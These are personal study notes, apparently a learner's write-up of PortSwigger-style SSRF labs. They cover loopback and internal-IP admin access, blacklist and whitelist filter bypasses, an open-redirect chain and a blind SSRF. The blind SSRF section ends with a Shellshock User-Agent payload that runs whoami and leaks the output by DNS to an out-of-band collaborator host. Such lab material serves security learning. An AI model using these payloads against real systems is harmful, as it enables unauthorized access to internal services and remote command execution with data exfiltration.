[TOC] # SSRF Attack Necessary Condition! -> We can control web application to launch HTTP request from the website IP Potential Attack Vector - API endpoint (For Query) ## Server -> loopback Interface  Sample ``` POST /product/stock HTTP/1.0 Content-Type: application/x-www-form-urlencoded stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1 ``` Sotckapi-> Parameter (it's a SSRF attack Vector) **it allow the web application launch the HTTP request !!!** Exploit ``` stockApi=http://localhost/admin ``` ### Implicitly trust requests Reason 1. Access control is front of the application 2. Machine allow Local-user access without login 3. Admin panel listen port is not same as website application ### LAB - Basic SSRF bypass admin Access control (local Host) Target: Access http://localhost/admin & delete carlos #### Recon Mapping web Site Structure  #### Analysis Attack Surface Dynamic URL  check the stock -> HTTP request !! `/product/stock` #### Identify Evaluate `/product/stock`  Poc ``` stockApi=http://127.0.0.1/ ```  Website return the admin panel, we can confirm there is a SSRF vulnerability Allow us to access admin panel #### Exploit Delete carlos Account ``` stockApi=http://127.0.0.1/admin/delete?username=carlos ```   Solved ! ## Back-end Systems  ### LAB Back-end Systems - Private Ip Enumerate Target 192.168.0.X : Port 8080 /admin/penal #### Recon Mapping web Site Structure  #### Analysis Attack Surface Dynamic URL  #### Identify Evaluate `/product/stock` Potential SSRF attack vector  Original Request ``` stockApi=http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1 ```  192.168.0.244 -> Suspicious Private IP (HOST UP) ``` stockApi=http://192.168.0.244:8080 ```  #### Exploit Exploit SSRF to delete the user ``` http://192.168.0.244:8080/admin/delete?username=carlos ```   Solved ! # Circumventing Defense ## Blacklist Bypass ### Another represent ``` 2130706433 017700000001 127.1 ``` ### DNS -> 127.0.0.1 ``` localtest.me customer1.app.localhost.my.company.127.0.0.1.nip.io 127.0.0.1.nip.io spoofed.burpcollaborator.net ``` ### Obfuscating - URL Encoding - Strings Variation ``` admin -> aDmin, Admin admin-> %61dmin ``` ### Open Redirect Provide the URL we can control, which redirected to target URL. Once redirect procedure have some extra actions such as -> Adding external header //Nigix-Redirect: /127.0.0.1/admin -> Switching the protocol //https->http It may allow attacker to by pass filter ### 127.0.0.1 alternate solution. ``` 2130706433 017700000001 127.1 ``` DNS -> 127.0.0.1 ``` localtest.me customer1.app.localhost.my.company.127.0.0.1.nip.io 127.0.0.1.nip.io spoofed.burpcollaborator.net ``` ### LAB Bypass SSRF defense (Blacklist) #### Recon Mapping web Site Structure  #### Analysis Attack Surface Dynamic URL  #### Identify Evaluated endpoint: `/product/stock`  Potential SSRF Vector ``` stockApi=http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1 ``` Loopback interface be blocked ``` stockApi=http://127.0.0.1 ```  Determine the filter is whitelist or blacklist ``` stockApi=http://meowhecker ```  Could not be blocked -> we are not be block !!! -> It may a blacklist filter Attempt DNS bypass ``` localtest.me customer1.app.localhost.my.company.127.0.0.1.nip.io 127.0.0.1.nip.io spoofed.burpcollaborator.net ```  Fail Attempt 2 ``` 2130706433 017700000001 127.1 ```  According the response -> 127.1 can bypass the SSRF defender ``` http://127.1/admin ```  I guest the defender like this ``` if (page == 'admin'){ access control(url.filter(worklist)) } ``` ## Using Url encode or Uper/lower letter bypass defender! ``` http://127.1/admin ``` Blocked Uper A ``` http://127.1/Admin ```  Success !! There is a SSRF vulnerability. #### Exploit Exploit SSRF vulnerability delete the carlos account ``` http://127.0.1/Admin/delete?username=carlos ```   Solved !! <!-- #### Recon Mapping web Site Structure #### Analysis Attack Surface Dynamic URL #### Identify #### Exploit --> ## SSRF with whitelist-base input filter ### Bypass Methods Core Concept is that insert the 'Valid host name 'to URL to bypass validation. Way-1 : Login Format ``` http://username:password@yoursitename.com ``` ``` https://excepted-host:password@evil-host ``` Way-2 : (HASH tags) ``` https://evil-host#excepted host name ``` Notice, Some time Hash tags will be replace to space '' when the application parse the URL we can double encode the Hash tags to avoid it be replace to null string. Way-3 : (Sub domain) ``` https://exceptedHostName.evil-Host ``` ### LAB:SSRF with whitelist-base input filter Vulnerable Features: "Stock check functionality" Goals: -> Touch the Internal server through SSRF #### Site Map  ### Dynamic Parameters  This endpoint pass a URL as parameter, this is probably exists a SSRF vulnerability. Normal Request  ``` http://stock.weliketoshop.net:8080/product/stock/check?productId=20&storeId=1 ``` Out of band testing ``` http://2run5llugo2gzl4ulyvm133cw32uqke9.oastify.com ```   if we add `stock.weliketoshop.net`, the request won't be block by filter ### Bypass White list whitelist - The part of URL must mach this patterns. ``` http%3a%2f%2fstock.weliketoshop.net ```  Analysis Attempt Embedding Login format -> Determine the website whether support this mechanism  It support Embedding login format. ``` http://meow:meow@stock.weliketoshop.net ``` Attempt1 ``` http://stock.weliketoshop.net:stock.weliketoshop.net@127.0.0.1 ```  No Work Attemp2 ``` http://meow#meow:meow@stock.weliketoshop.net ```  Attempting Double encode '#' Avoid '#' be replace !  Payload ``` http://meow%23meow:meow@stock.weliketoshop.net ``` Work ### Exploit Attempt to Access Localhost Page ``` http%3a//127.0.0.1%2523meow%3ameow%40stock.weliketoshop.net ```  Attempting access Admin panel ``` http://127.0.0.1/admin%23meow:meow@stock.weliketoshop.net ``` ``` http%3a//127.0.0.1/admin/%2523meow%3ameow%40stock.weliketoshop.net ``` (fail) we can attempt use merge way to past our malicious payload  Merge Way ``` http://127.0.0.1#meow:meow@stock.weliketoshop.net/admin http%3a//127.0.0.1%2523meow%3ameow%40stock.weliketoshop.net/admin ```   ## Bypassing SSRF filter via open redirection URL Redirection == URL forwarding 301 Statue (永久重定向)  302 Statue (Template Redirect) ### Requirement back-end API support open redirection **Open Redirect Vulnerability ** ```php= if(user_login()){ $path = $_GET['path']; header("Location:", $path); exit; } ```  Path parameter we can control ! Sometime we can add %0a%0d to add arbitrary http header. (Exploit proxy) http://example.com/login?redirect=http://malicious-site.com ### LAB:SSRF filter bypass via open redirection vulnerability #### Site map  #### Dynamic Parameter ``` /product/nextProduct?currentProductId=1&path=/product?productId=2 ```   Open Redirection ``` POST /product/stock ``` API end point   ``` http://127.0.0.1 ```  ``` /127.0.0.1 ```  According the response result, we can inference that website is not allow "http" in query string #### Bypass 'HTTP' input filter  ``` 2fproduct/nextProduct?currentProductId=1&path=/product?productId=2 ```  Work #### Exploit ``` /product/nextProduct?currentProductId=1&path=http://127.0.0.1 ```  Admin Panel !   Solve # Bind SSRF vulnerability Once back-end response not return in application's front-end response, we called it (Bind SSRF) Impact -> RCE ## Identify - Bind SSRF The base way is using Out of band technique -> Brup collaborator we can to observer the DNS lock-up to know the backend service whether to attempt to make http request ## Exploit we can use the Bind SSRF to scan the internal IP address space. or sending the well know Auth-RCE (payload)  Blind SSRF + Command Injection  ### LAB - Blind SSRF + Command injection #### SiteMap  #### Dynamic Parameter ``` GET /product?productId=1 HTTP/2 ```  ### Identify SSRF vulnerability   web page not return burp collaborator response  This is a blind SSRF vulnerability ! ### Exploit Attempt Command Injection -> ``` User-Agent: () { :; }; /usr/bin/nslookup $(whoami).re9csa8j3dp5marj8nibosq1jspjdf14.oastify.com ``` Enumerate Ip ``` Reference: http://192.168.0.1:8080 ```   OS Name: peter-Tf6vWQ  Owner 侯智晟-meowheckerouo@gmail.com